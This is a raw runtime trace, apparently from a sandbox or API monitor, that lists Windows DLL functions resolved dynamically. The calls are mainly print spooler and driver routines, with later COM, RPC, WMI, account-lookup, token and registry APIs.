DynamicLoader: unidrvui.dll/DrvDeviceCapabilities
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/StartDocDlgW
DynamicLoader: WINSPOOL.DRV/OpenPrinterW
DynamicLoader: WINSPOOL.DRV/ResetPrinterW
DynamicLoader: WINSPOOL.DRV/ClosePrinter
DynamicLoader: WINSPOOL.DRV/GetPrinterW
DynamicLoader: WINSPOOL.DRV/GetPrinterDriverW
DynamicLoader: WINSPOOL.DRV/EndDocPrinter
DynamicLoader: WINSPOOL.DRV/EndPagePrinter
DynamicLoader: WINSPOOL.DRV/ReadPrinter
DynamicLoader: WINSPOOL.DRV/StartDocPrinterW
DynamicLoader: WINSPOOL.DRV/StartPagePrinter
DynamicLoader: WINSPOOL.DRV/AbortPrinter
DynamicLoader: WINSPOOL.DRV/DocumentEvent
DynamicLoader: WINSPOOL.DRV/QuerySpoolMode
DynamicLoader: WINSPOOL.DRV/QueryRemoteFonts
DynamicLoader: WINSPOOL.DRV/SeekPrinter
DynamicLoader: WINSPOOL.DRV/QueryColorProfile
DynamicLoader: WINSPOOL.DRV/SplDriverUnloadComplete
DynamicLoader: WINSPOOL.DRV/DocumentPropertiesW
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: WINSPOOL.DRV/IsValidDevmodeW
DynamicLoader: WINSPOOL.DRV/GetSpoolFileHandle
DynamicLoader: WINSPOOL.DRV/CommitSpoolData
DynamicLoader: WINSPOOL.DRV/CloseSpoolFileHandle
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: unidrvui.dll/DrvDocumentEvent
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentEvent
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: mxdwdrv.dll/DrvEnableDriver
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: FontSub.dll/CreateFontPackage
DynamicLoader: unidrvui.dll/MxdcGetPDEVAdjustment
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDeviceCapabilities
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDeviceCapabilities
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDeviceCapabilities
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: FontSub.dll/CreateFontPackage
DynamicLoader: unidrvui.dll/MxdcGetPDEVAdjustment
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: prntvpt.dll/PTOpenProvider
DynamicLoader: prntvpt.dll/PTCloseProvider
DynamicLoader: prntvpt.dll/PTConvertDevModeToPrintTicket
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDeviceCapabilities
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentEvent
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentEvent
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: FontSub.dll/CreateFontPackage
DynamicLoader: unidrvui.dll/MxdcGetPDEVAdjustment
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentEvent
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentEvent
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: FontSub.dll/CreateFontPackage
DynamicLoader: unidrvui.dll/MxdcGetPDEVAdjustment
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentEvent
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentEvent
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: FontSub.dll/CreateFontPackage
DynamicLoader: unidrvui.dll/MxdcGetPDEVAdjustment
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: ole32.dll/CoGetClassObject
DynamicLoader: ole32.dll/CoGetMarshalSizeMax
DynamicLoader: ole32.dll/CoMarshalInterface
DynamicLoader: ole32.dll/CoUnmarshalInterface
DynamicLoader: ole32.dll/StringFromIID
DynamicLoader: ole32.dll/CoGetPSClsid
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: ole32.dll/CoReleaseMarshalData
DynamicLoader: ole32.dll/DcomChannelSetHResult
DynamicLoader: VSSAPI.DLL/CreateWriter
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ADVAPI32.dll/LookupAccountNameW
DynamicLoader: sechost.dll/LookupAccountNameLocalW
DynamicLoader: ADVAPI32.dll/LookupAccountSidW
DynamicLoader: samcli.dll/NetLocalGroupGetMembers
DynamicLoader: SAMLIB.dll/SamConnect
DynamicLoader: RPCRT4.dll/NdrClientCall3
DynamicLoader: RPCRT4.dll/RpcStringBindingComposeW
DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingW
DynamicLoader: RPCRT4.dll/RpcStringFreeW
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: SAMLIB.dll/SamOpenDomain
DynamicLoader: SAMLIB.dll/SamLookupNamesInDomain
DynamicLoader: SAMLIB.dll/SamOpenAlias
DynamicLoader: SAMLIB.dll/SamFreeMemory
DynamicLoader: SAMLIB.dll/SamCloseHandle
DynamicLoader: SAMLIB.dll/SamGetMembersInAlias
DynamicLoader: netutils.dll/NetApiBufferFree
DynamicLoader: SAMLIB.dll/SamEnumerateDomainsInSamServer
DynamicLoader: SAMLIB.dll/SamLookupDomainInSamServer
DynamicLoader: ole32.dll/CoCreateGuid
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: ole32.dll/StringFromCLSID
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: PROPSYS.dll/VariantToPropVariant
DynamicLoader: OLEAUT32.dll/
DynamicLoader: wbemcore.dll/Reinitialize
DynamicLoader: wbemsvc.dll/DllGetClassObject
DynamicLoader: wbemsvc.dll/DllCanUnloadNow
DynamicLoader: authZ.dll/AuthzInitializeContextFromToken
DynamicLoader: authZ.dll/AuthzInitializeObjectAccessAuditEvent2
DynamicLoader: authZ.dll/AuthzAccessCheck
DynamicLoader: authZ.dll/AuthzFreeAuditEvent
DynamicLoader: authZ.dll/AuthzFreeContext
DynamicLoader: authZ.dll/AuthzInitializeResourceManager
DynamicLoader: authZ.dll/AuthzFreeResourceManager
DynamicLoader: RPCRT4.dll/NdrClientCall3
DynamicLoader: RPCRT4.dll/RpcBindingCreateW
DynamicLoader: RPCRT4.dll/RpcBindingBind
DynamicLoader: RPCRT4.dll/I_RpcMapWin32Status
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: ADVAPI32.dll/EventRegister
DynamicLoader: ADVAPI32.dll/EventUnregister
DynamicLoader: ADVAPI32.dll/EventWrite
DynamicLoader: kernel32.dll/RegCloseKey
DynamicLoader: kernel32.dll/RegSetValueExW
DynamicLoader: kernel32.dll/RegOpenKeyExW
DynamicLoader: kernel32.dll/RegQueryValueExW
DynamicLoader: kernel32.dll/RegCloseKey
DynamicLoader: wmisvc.dll/IsImproperShutdownDetected
DynamicLoader: Wevtapi.dll/EvtRender
DynamicLoader: Wevtapi.dll/EvtNext
DynamicLoader: Wevtapi.dll/EvtClose
DynamicLoader: Wevtapi.dll/EvtQuery
DynamicLoader: Wevtapi.dll/EvtCreateRenderContext
DynamicLoader: RPCRT4.dll/RpcStringBindingComposeW
DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingW
DynamicLoader: RPCRT4.dll/RpcBindingSetAuthInfoExW
DynamicLoader: RPCRT4.dll/RpcBindingSetOption
DynamicLoader: RPCRT4.dll/RpcStringFreeW
DynamicLoader: RPCRT4.dll/NdrClientCall3
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: ole32.dll/CoCreateFreeThreadedMarshaler
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoGetMarshalSizeMax
DynamicLoader: ole32.dll/CreateStreamOnHGlobal
DynamicLoader: ole32.dll/CoMarshalInterface
DynamicLoader: ADVAPI32.dll/RegCreateKeyExW
DynamicLoader: ADVAPI32.dll/RegSetValueExW
DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
DynamicLoader: CRYPTSP.dll/CryptGenRandom
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: KERNELBASE.dll/InitializeAcl
DynamicLoader: KERNELBASE.dll/AddAce
DynamicLoader: sechost.dll/ConvertStringSecurityDescriptorToSecurityDescriptorW
DynamicLoader: kernel32.dll/IsThreadAFiber
DynamicLoader: kernel32.dll/OpenProcessToken
DynamicLoader: KERNELBASE.dll/GetTokenInformation
DynamicLoader: KERNELBASE.dll/DuplicateTokenEx
DynamicLoader: KERNELBASE.dll/AdjustTokenPrivileges
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: kernel32.dll/SetThreadToken
DynamicLoader: KERNELBASE.dll/CheckTokenMembership
DynamicLoader: ole32.dll/CLSIDFromString
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: KERNELBASE.dll/AllocateAndInitializeSid
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ADVAPI32.dll/RegOpenKeyW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: authZ.dll/AuthzInitializeContextFromToken
DynamicLoader: authZ.dll/AuthzInitializeResourceManager
DynamicLoader: authZ.dll/AuthzInitializeContextFromSid
DynamicLoader: authZ.dll/AuthzInitializeContextFromToken
DynamicLoader: authZ.dll/AuthzAccessCheck
DynamicLoader: authZ.dll/AuthzFreeContext
DynamicLoader: authZ.dll/AuthzFreeResourceManager
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: ole32.dll/CoGetClassObject
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoGetCallContext
DynamicLoader: wbemcore.dll/Reinitialize
DynamicLoader: ole32.dll/CoImpersonateClient
DynamicLoader: ADVAPI32.dll/OpenThreadToken
DynamicLoader: ole32.dll/CoRevertToSelf
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoSwitchCallContext
DynamicLoader: ole32.dll/CoCreateGuid
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: sechost.dll/ConvertStringSecurityDescriptorToSecurityDescriptorW
DynamicLoader: sechost.dll/ConvertStringSecurityDescriptorToSecurityDescriptorW
DynamicLoader: ADVAPI32.dll/LogonUserExExW
DynamicLoader: SspiCli.dll/LogonUserExExW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: wbemcore.dll/Reinitialize
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/RegCreateKeyExW
DynamicLoader: ntdll.dll/EtwRegisterTraceGuidsW
DynamicLoader: ntdll.dll/EtwRegisterTraceGuidsW
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: ntmarta.dll/GetMartaExtensionInterface
DynamicLoader: sechost.dll/LookupAccountNameLocalW
DynamicLoader: ADVAPI32.dll/LookupAccountSidW
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
DynamicLoader: CRYPTSP.dll/CryptGenRandom
DynamicLoader: RpcRtRemote.dll/I_RpcExtInitializeExtensionPoint
DynamicLoader: ole32.dll/CoGetClassObject
DynamicLoader: ole32.dll/CoGetMarshalSizeMax
DynamicLoader: ole32.dll/CoMarshalInterface
DynamicLoader: ole32.dll/CoUnmarshalInterface
DynamicLoader: ole32.dll/StringFromIID
DynamicLoader: ole32.dll/CoGetPSClsid
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: ole32.dll/CoReleaseMarshalData
DynamicLoader: ole32.dll/DcomChannelSetHResult
DynamicLoader: ole32.dll/CoGetMarshalSizeMax
DynamicLoader: ole32.dll/CoMarshalInterface
DynamicLoader: ole32.dll/CoUnmarshalInterface
DynamicLoader: ole32.dll/CoReleaseMarshalData
DynamicLoader: wbemsvc.dll/DllGetClassObject
DynamicLoader: wbemsvc.dll/DllCanUnloadNow
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/RegOpenKeyExW
DynamicLoader: kernel32.dll/RegQueryValueExW
DynamicLoader: kernel32.dll/RegCloseKey
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ADVAPI32.dll/RegOpenKeyW
DynamicLoader: kernel32.dll/GetThreadPreferredUILanguages
DynamicLoader: kernel32.dll/SetThreadPreferredUILanguages
DynamicLoader: kernel32.dll/LocaleNameToLCID
DynamicLoader: kernel32.dll/GetLocaleInfoEx
DynamicLoader: kernel32.dll/LCIDToLocaleName
DynamicLoader: kernel32.dll/GetSystemDefaultLocaleName
DynamicLoader: ADVAPI32.dll/LsaEnumerateTrustedDomains
DynamicLoader: ADVAPI32.dll/LsaQueryInformationPolicy
DynamicLoader: ADVAPI32.dll/LsaNtStatusToWinError
DynamicLoader: ADVAPI32.dll/LsaFreeMemory
DynamicLoader: ADVAPI32.dll/LsaOpenPolicy
DynamicLoader: ADVAPI32.dll/LsaClose
DynamicLoader: ADVAPI32.dll/QueryServiceStatusEx
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx
DynamicLoader: ADVAPI32.dll/SetSecurityDescriptorControl
DynamicLoader: ADVAPI32.dll/ConvertToAutoInheritPrivateObjectSecurity
DynamicLoader: ADVAPI32.dll/DestroyPrivateObjectSecurity
DynamicLoader: ADVAPI32.dll/CheckTokenMembership
DynamicLoader: ADVAPI32.dll/AddAccessAllowedObjectAce
DynamicLoader: ADVAPI32.dll/AddAccessDeniedObjectAce
DynamicLoader: ADVAPI32.dll/AddAuditAccessObjectAce
DynamicLoader: ADVAPI32.dll/SetNamedSecurityInfoW
DynamicLoader: ADVAPI32.dll/GetNamedSecurityInfoW
DynamicLoader: ADVAPI32.dll/SetNamedSecurityInfoExW
DynamicLoader: ADVAPI32.dll/GetExplicitEntriesFromAclW
DynamicLoader: ADVAPI32.dll/GetEffectiveRightsFromAclW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ADVAPI32.dll/LookupAccountSidW
DynamicLoader: userenv.dll/DestroyEnvironmentBlock
DynamicLoader: userenv.dll/CreateEnvironmentBlock
DynamicLoader: sechost.dll/ConvertSidToStringSidW
DynamicLoader: SspiCli.dll/GetUserNameExW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/StringFromCLSID
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ntdll.dll/EtwUnregisterTraceGuids
DynamicLoader: ntdll.dll/EtwUnregisterTraceGuids
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: shell32.dll/
DynamicLoader: ole32.dll/CoGetApartmentType
DynamicLoader: ole32.dll/CoRegisterInitializeSpy
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoGetMalloc
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ole32.dll/CreateBindCtx
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_Size_ExW
DynamicLoader: ADVAPI32.dll/RegEnumKeyW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ADVAPI32.dll/InitializeSecurityDescriptor
DynamicLoader: ADVAPI32.dll/SetEntriesInAclW
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_ExW
DynamicLoader: ntmarta.dll/GetMartaExtensionInterface
DynamicLoader: ADVAPI32.dll/SetSecurityDescriptorDacl
DynamicLoader: ADVAPI32.dll/IsTextUnicode
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: shell32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: ole32.dll/CoGetMalloc
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ntdll.dll/RtlDllShutdownInProgress
DynamicLoader: propsys.dll/PSCreateMemoryPropertyStore
DynamicLoader: sechost.dll/ConvertSidToStringSidW
DynamicLoader: profapi.dll/
DynamicLoader: LINKINFO.dll/CreateLinkInfoW
DynamicLoader: USER32.dll/IsCharAlphaW
DynamicLoader: USER32.dll/CharPrevW
DynamicLoader: ntshrui.dll/GetNetResourceFromLocalPathW
DynamicLoader: srvcli.dll/NetShareEnum
DynamicLoader: cscapi.dll/CscNetApiGetInterface
DynamicLoader: slc.dll/SLGetWindowsInformationDWORD
DynamicLoader: SHLWAPI.dll/PathRemoveFileSpecW
DynamicLoader: LINKINFO.dll/DestroyLinkInfo
DynamicLoader: propsys.dll/PropVariantToBoolean
DynamicLoader: ole32.dll/PropVariantClear
DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
DynamicLoader: CRYPTSP.dll/CryptGenRandom
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: ole32.dll/CoRevokeInitializeSpy
DynamicLoader: comctl32.dll/
DynamicLoader: OLEAUT32.dll/
